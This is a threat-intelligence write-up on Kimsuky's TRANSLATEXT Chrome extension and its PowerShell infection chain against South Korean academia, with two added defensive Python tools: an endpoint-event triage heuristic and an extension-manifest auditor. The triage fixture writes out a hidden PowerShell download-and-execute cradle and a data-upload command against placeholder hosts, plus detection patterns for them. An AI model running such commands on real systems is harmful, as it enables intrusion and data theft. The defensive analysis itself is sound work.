Kimsuky Unleashes TRANSLATEXT: A New Malicious Chrome Extension Targeting South Korean Academia

Introduction

The cyber threat landscape has seen a new development with the emergence of a malicious Google Chrome extension, TRANSLATEXT, linked to the North Korean hacking group Kimsuky. This extension is part of an ongoing intelligence collection effort aimed at stealing sensitive information from targeted individuals. The extension, identified by Zscaler ThreatLabz in early March 2024, has raised concerns due to its sophisticated design and specific targeting of South Korean academia, particularly those focusing on North Korean political affairs.

Kimsuky: A Notorious Threat Actor

Kimsuky, a well-known North Korean hacking group, has been active since at least 2012. The group is notorious for its cyber espionage and financially motivated attacks targeting South Korean entities. It is considered a sister group to the Lazarus cluster and is part of the Reconnaissance General Bureau (RGB). Kimsuky is also tracked under various names, including APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet, Springtail, and Velvet Chollima.

The Emergence of TRANSLATEXT

TRANSLATEXT, the newly discovered malicious Chrome extension, is designed to steal a range of sensitive information, including email addresses, usernames, passwords, cookies, and browser screenshots. Zscaler ThreatLabz highlighted its ability to gather intelligence from targeted individuals. The extension masquerades as Google Translate and incorporates JavaScript code to bypass security measures for services like Google, Kakao, and Naver.

Campaign Targeting and Attack Methodology

The targeted campaign directed against South Korean academia is a continuation of Kimsuky's long-standing interest in gathering intelligence on North Korean political affairs. The exact mode of initial access for the newly discovered activity remains unclear, although Kimsuky is known to use spear-phishing and social engineering attacks to initiate the infection chain.

The attack typically begins with a ZIP archive purportedly about Korean military history, containing a Hangul Word Processor document and an executable file. Launching the executable retrieves a PowerShell script from an attacker-controlled server, exporting information about the compromised victim to a GitHub repository and downloading additional PowerShell code via a Windows shortcut (LNK) file.
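The chain above leaves a recognizable trail in endpoint telemetry. The following is an added defensive example, not code from the article or from any vendor report: it scores Windows process-creation events for the stages the article describes (an executable run from an extracted archive that spawns PowerShell, PowerShell fetching a remote script, PowerShell contacting GitHub, and PowerShell launched straight from Explorer as a double-clicked shortcut would be). The event field names, user, paths, hosts and repository names are all constructed for illustration.

```python
"""Added defensive example: heuristic scoring of process-creation events for the
ZIP -> EXE -> PowerShell -> GitHub / LNK chain described in the article.
Field names, paths, hosts and repositories are constructed, not real telemetry."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process image
    image: str          # full path of the created process image
    command_line: str   # command line of the created process


# Constructed sample telemetry (hypothetical user, paths and hosts).
SAMPLE_EVENTS = [
    # 0: executable double-clicked inside Explorer's view of an extracted ZIP
    ProcEvent("C:\\Windows\\explorer.exe",
              "C:\\Users\\kim\\AppData\\Local\\Temp\\Temp1_history.zip\\history.exe",
              "\"C:\\Users\\kim\\AppData\\Local\\Temp\\Temp1_history.zip\\history.exe\""),
    # 1: that executable spawns hidden PowerShell that downloads a script
    ProcEvent("C:\\Users\\kim\\AppData\\Local\\Temp\\Temp1_history.zip\\history.exe",
              "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://stage.example.invalid/s.ps1')\""),
    # 2: PowerShell pushes victim information to a GitHub repository
    ProcEvent("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "powershell.exe -c \"Invoke-RestMethod -Uri https://api.github.com/repos/"
              "example/repo/contents/info.txt -Method Put\""),
    # 3: Explorer launches PowerShell directly (shortcut / LNK pattern) to fetch more code
    ProcEvent("C:\\Windows\\explorer.exe",
              "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "powershell.exe -c \"iwr https://raw.githubusercontent.com/example/repo/main/"
              "next.ps1 -OutFile $env:TEMP/next.ps1\""),
    # 4: benign noise
    ProcEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\notepad.exe",
              "notepad.exe notes.txt"),
]

PS_DOWNLOAD = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Net\.WebClient",
    re.I)
PS_EVASION = re.compile(r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass", re.I)
GITHUB_HOST = re.compile(r"\bgithub\.com\b|\bgithubusercontent\.com\b", re.I)
USER_WRITABLE = re.compile(r"\\AppData\\Local\\Temp\\|\\Downloads\\", re.I)
# Explorer extracts a ZIP it is browsing into %TEMP%\Temp1_<archive>.zip\
EXE_IN_EXTRACTED_ZIP = re.compile(r"\\Temp\\[^\\]*\.zip\\[^\\]+\.exe$", re.I)


def _is_powershell(image: str) -> bool:
    return image.lower().endswith(("powershell.exe", "pwsh.exe"))


def score_event(ev: ProcEvent) -> list[str]:
    """Return the names of every heuristic the event trips."""
    flags = []
    if EXE_IN_EXTRACTED_ZIP.search(ev.image):
        flags.append("exe_run_from_extracted_zip")
    if _is_powershell(ev.image):
        if USER_WRITABLE.search(ev.parent_image):
            flags.append("powershell_from_temp_parent")
        if ev.parent_image.lower().endswith("explorer.exe"):
            flags.append("explorer_spawns_powershell")  # shortcut double-click pattern
        if PS_DOWNLOAD.search(ev.command_line):
            flags.append("download_cradle")
        if PS_EVASION.search(ev.command_line):
            flags.append("hidden_or_bypass")
        if GITHUB_HOST.search(ev.command_line):
            flags.append("github_contact")
    return flags


def triage(events, min_flags: int = 2):
    """Return (index, flags) for events tripping at least min_flags heuristics."""
    hits = []
    for i, ev in enumerate(events):
        flags = score_event(ev)
        if len(flags) >= min_flags:
            hits.append((i, flags))
    return hits


if __name__ == "__main__":
    for idx, flags in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(flags)}")
```

Any single heuristic fires on legitimate administration too (PowerShell fetching from GitHub is common in developer environments), which is why `triage` requires two or more on one event; in practice the parent/child relationship between events 0, 1 and 2 is the stronger signal and would be stitched together by process-tree correlation in an EDR.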

Recent Activities and Exploits

In recent weeks, Kimsuky has weaponized a known security flaw in Microsoft Office (CVE-2017-11882) to distribute a keylogger and has used job-themed lures in attacks aimed at the aerospace and defense sectors. The job-themed attacks aim to drop an espionage tool capable of gathering data and executing secondary payloads.

According to cybersecurity company CyberArmor, Kimsuky has employed a previously undocumented backdoor that allows attackers to perform basic reconnaissance and drop additional payloads for remote control of compromised machines. CyberArmor has named this campaign Niki.

TRANSLATEXT Extension: Technical Details

Zscaler discovered the GitHub account hosting the TRANSLATEXT extension under the name "GoogleTranslate.crx," created on February 13, 2024. The files were briefly present in the repository on March 7, 2024, and deleted the next day, indicating that Kimsuky intended to minimize exposure and use the malware for a short period to target specific individuals.

The TRANSLATEXT extension incorporates functionality to siphon email addresses, credentials and cookies, and to capture browser screenshots. It fetches commands from a Blogger Blogspot URL to take screenshots of newly opened tabs and delete all cookies from the browser, among other actions.
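An extension can only read cookies, capture tabs and inject JavaScript into Google, Kakao or Naver pages if its manifest requests those capabilities, so a manifest audit is a practical first check for a side-loaded extension of this kind. The following is an added defensive example, not code from the article or from Zscaler's report: it scores a Chrome extension manifest for the capability set the article attributes to TRANSLATEXT, combined with brand-impersonation and side-loading indicators. The weights, the impersonation watch list, the `audit_manifest` and `audit_manifest_file` helper names and both sample manifests are constructed for illustration; the Chrome Web Store `update_url` is the real value the store writes into installed extensions.

```python
"""Added defensive example: audit a Chrome extension manifest for the capability
set described in the article (cookies, tabs/screenshots, script injection into
Google/Kakao/Naver pages) plus impersonation and side-loading indicators.
Weights, watch lists and sample manifests are constructed."""
import json
from pathlib import Path

# Permissions whose combination enables credential, cookie and screenshot theft.
SENSITIVE_PERMISSIONS = {
    "cookies": "read or delete cookies for any permitted host",
    "tabs": "enumerate tabs and capture visible tab contents",
    "scripting": "inject scripts into pages (MV3)",
    "webRequest": "observe requests and responses",
    "webRequestBlocking": "modify requests in flight (MV2)",
    "declarativeNetRequest": "rewrite or block requests (MV3)",
}
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Hosts the article names as targets of the extension's injected JavaScript.
WATCHED_HOSTS = ("google.com", "kakao.com", "naver.com")
# Constructed watch list of product names a malicious extension might borrow.
IMPERSONATED_NAMES = {"google translate", "google docs offline", "adobe acrobat"}
WEB_STORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"

# Constructed sample manifests (hypothetical file names and versions).
SUSPICIOUS_MANIFEST = {
    "manifest_version": 3, "name": "Google Translate", "version": "2.0.13",
    "permissions": ["cookies", "tabs", "scripting", "storage"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["*://*.google.com/*", "*://*.kakao.com/*",
                                     "*://*.naver.com/*"], "js": ["content.js"]}],
    "background": {"service_worker": "background.js"},
}
BENIGN_MANIFEST = {
    "manifest_version": 3, "name": "Reading Ruler", "version": "1.2.0",
    "permissions": ["storage", "activeTab"],
    "update_url": WEB_STORE_UPDATE_URL,
}


def _host_patterns(manifest: dict) -> list[str]:
    """Collect host match patterns from MV3 host_permissions and MV2 permissions."""
    patterns = list(manifest.get("host_permissions", []))
    patterns += [p for p in manifest.get("permissions", [])
                 if "://" in p or p == "<all_urls>"]
    return patterns


def audit_manifest(manifest: dict) -> dict:
    """Score a parsed manifest; returns score, verdict and human-readable findings."""
    findings, score = [], 0
    name = manifest.get("name", "")
    if name.strip().lower() in IMPERSONATED_NAMES:
        findings.append(f"name '{name}' matches a well-known product (impersonation watch list)")
        score += 3
    for perm in manifest.get("permissions", []):
        if perm in SENSITIVE_PERMISSIONS:
            findings.append(f"sensitive permission '{perm}': {SENSITIVE_PERMISSIONS[perm]}")
            score += 2
    for pattern in _host_patterns(manifest):
        if pattern in BROAD_HOST_PATTERNS:
            findings.append(f"broad host permission '{pattern}'")
            score += 2
    for cs in manifest.get("content_scripts", []):
        for match in cs.get("matches", []):
            if any(host in match for host in WATCHED_HOSTS):
                findings.append(f"content script injected into watched host pattern '{match}'")
                score += 1
    if manifest.get("update_url") != WEB_STORE_UPDATE_URL:
        findings.append("update_url absent or not the Chrome Web Store: "
                        "side-loaded, self-hosted or repackaged extension")
        score += 2
    return {"score": score, "verdict": "high" if score >= 6 else "low", "findings": findings}


def audit_manifest_file(path) -> dict:
    """Audit a manifest.json on disk (e.g. from a user's Chrome Extensions folder)."""
    return audit_manifest(json.loads(Path(path).read_text(encoding="utf-8")))


if __name__ == "__main__":
    for label, manifest in (("suspicious", SUSPICIOUS_MANIFEST), ("benign", BENIGN_MANIFEST)):
        result = audit_manifest(manifest)
        print(f"{label}: {result['verdict']} ({result['score']})")
        for finding in result["findings"]:
            print("  -", finding)
```

The `update_url` check deliberately treats enterprise-hosted extensions as findings rather than silently exempting them; an organisation that self-hosts extensions would add its own update host to the allowed set. Point `audit_manifest_file` at each `manifest.json` under a user's Chrome `Extensions` directory to sweep a machine.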

Conclusion

The emergence of the TRANSLATEXT extension underscores the persistent threat posed by Kimsuky. The group's sophisticated attack methods and targeted campaigns highlight the need for heightened cybersecurity measures, particularly for entities involved in sensitive political affairs. By understanding the tactics and tools employed by threat actors like Kimsuky, organizations can better prepare and defend against such cyber threats. The ongoing vigilance and collaboration among cybersecurity professionals are essential to mitigate the risks posed by these malicious activities.